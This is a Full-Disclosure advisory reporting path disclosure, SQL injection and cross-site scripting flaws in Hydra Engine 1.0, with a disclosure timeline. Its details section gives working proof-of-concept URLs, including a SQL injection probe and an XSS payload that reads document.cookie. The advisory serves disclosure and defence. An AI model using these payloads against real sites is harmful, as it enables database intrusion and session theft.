Hydra CMS suffers from cross site scripting and remote SQL injection vulnerabilities.
7ae091808029de57dae5ca81b731c5d50b7cabf9a9cc60641fdd0bbdb3afd67c
Hello Full-Disclosure!
I want to warn you about vulnerabilities in Hydra Engine. It's commercial
Ukrainian CMS.
-----------------------------
Advisory: Vulnerabilities in Hydra Engine
-----------------------------
URL: http://websecurity.com.ua/3453/
-----------------------------
Timeline:
26.08.2009 - found the vulnerabilities.
28.08.2009 - announced at my site.
09.09.2009 - informed developers.
30.01.2010 - disclosed at my site.
-----------------------------
Details:
These are Full path disclosure, SQL Injection and Cross-Site Scripting
vulnerabilities.
Full path disclosure:
http://site/search//
SQL Injection:
http://site/search/'%20and%20version()%3E5--%20/
XSS:
http://site/search/'1%3Cbody%20onload=alert(document.cookie)%3E/
Vulnerable is Hydra Engine 1.0.
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua